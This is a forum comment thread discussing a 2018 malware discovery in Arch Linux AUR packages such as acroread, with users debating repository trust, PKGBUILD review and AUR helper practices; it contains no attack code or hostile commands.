Arch Linux AUR Repository Found to Contain Malware

From the article:<p>&quot;This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories.&quot;<p>LOL. Why should this only apply to Linux users? We should all be wary of downloading random things from websites.<p>AUR has always been labeled &quot;user submitted&quot;, but I guess it&#x27;s easy to forget that some &quot;users&quot; are really out to cause harm.

The article mentions 3 infected packages. But it only lists one: acroread.<p>Then the comment section mentions the other one is libvlc.<p>But the mailing list says this is something different: <a href="https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;034158.html" rel="nofollow">https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;...</a><p>So then there&#x27;s still two missing.<p>Here&#x27;s what I&#x27;ve found that he maintained:<p>1) balz (<a href="https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI" rel="nofollow">https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI</a>)<p>2) minergate (<a href="https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI" rel="nofollow">https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI</a>)<p>3) acroread - as mentioned (<a href="https:&#x2F;&#x2F;my.mixtape.moe&#x2F;kvfpmk.png" rel="nofollow">https:&#x2F;&#x2F;my.mixtape.moe&#x2F;kvfpmk.png</a>)<p>So those &quot;balz&quot; and &quot;minergate&quot; could be the missing two.<p>Edit: seems like archive.fo is temporarily down, so it will just be my word for it right now. Sorry.

For the people interested, here&#x27;s the actual commit from the acroread package:<p><a href="https:&#x2F;&#x2F;aur.archlinux.org&#x2F;cgit&#x2F;aur.git&#x2F;commit&#x2F;?h=acroread&amp;id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc" rel="nofollow">https:&#x2F;&#x2F;aur.archlinux.org&#x2F;cgit&#x2F;aur.git&#x2F;commit&#x2F;?h=acroread&amp;id...</a>

Doesnt everyone know AUR packages are inherently unsafe? if you wanted to make sure they werent up to something you could read the pkgbuild

Unfortunately lots of things one actually wants are on AUR, things like jpeginfo, golly, steam-fonts, simple-mtpfs, jslint, ...<p>A case for putting more things in the main Archlinux repositories!

This is exactly what we&#x27;ve been preparing for. Don&#x27;t use yaourt, and read those diffs. I know a lot of people don&#x27;t do this, but it&#x27;s important.

I mean, is this new information? I always look at the upvotes on the package to see if it has been tested.

As an Arch user this bothers me since a while. On the one hand the AUR contains packages I don&#x27;t want to miss, on the other hand installing and updating from the AUR is tiresome.<p>Recently I switched to the AUR helper aurman which is great, but it still doesn&#x27;t free you from reviewing PKGBUILD changes. Sometimes I wish there would be some kind of review process where popular packages could be labeled as &#x27;reviewed&#x27; (e.g. by experienced&#x2F;trusted arch users) and an (optional) option within the AUR helpers to accept &#x27;reviewed&#x27; packages without presenting the PKGBUILD for review.<p>I know that wouldn&#x27;t be perfect either, but at least it would increase the efficiency and as a user one could focus on the less popular packages where it is unlikely that someone else will find some malware.

Is there a public database of linux malware found in the wild that one can study to know what kind of things to look for when reviewing PKGBUILDs and other open source code?<p>EDIT: s&#x2F;repository&#x2F;public database&#x2F;

I&#x27;m surprised that this hasn&#x27;t happened a lot earlier to be honest. It probably has but haven&#x27;t been picked up by someone. It&#x27;s a user submitted repo with over 44000 packages (source repology [0]).<p>It has happened to the snap store recently, but AUR has been around for ages.<p>[0]: <a href="https:&#x2F;&#x2F;repology.org&#x2F;repository&#x2F;aur" rel="nofollow">https:&#x2F;&#x2F;repology.org&#x2F;repository&#x2F;aur</a>

&gt; Following the discovery all dangerous instances were removed and the user account suspended.<p>I heard they&#x27;re making a change to the policy for uploading packages to AUR. The next time this happens the user will automatically receive an email that says, &quot;Hey, don&#x27;t do that.&quot;

I tried installing Arch Linux, and it was harder then installing SunOS 4.3. The instructions were absolutely wrong. I wish I could give it another try, but I just don&#x27;t have time to experience the wow&#x27;s of the early 90s just to get a browser up.

Not a surprise.

I don&#x27;t know a single Arch Linux user who doesn&#x27;t check the PKGBUILD of the packages they get from AUR.

I really hope one day Linux stops using package managers and switches to single-file binary installers as in Windows and Mac. Until that day, I won&#x27;t feel completely comfortable using Linux.<p>Package managers are an inherently flawed way to distribute software, instead of obtaining your programs from whoever developed that program you get it from your OS developer!.

The Arch User Repository hosts whatever people want to upload to it, with basically no proactive vetting whatsoever. In addition, the installation scripts run arbitrary code, a portion of which must run with root privileges. When a package gets orphaned, that means that anybody in the community can take over maintainership of the package.<p>There&#x27;s a whole lot of trust that has to go on when installing a package from the AUR - and yes, this is a fundamental problem with the security model of Arch Linux, but that&#x27;s been known for a very long time.<p>Honestly, I&#x27;d be surprised if this hasn&#x27;t happened before with orphaned packages.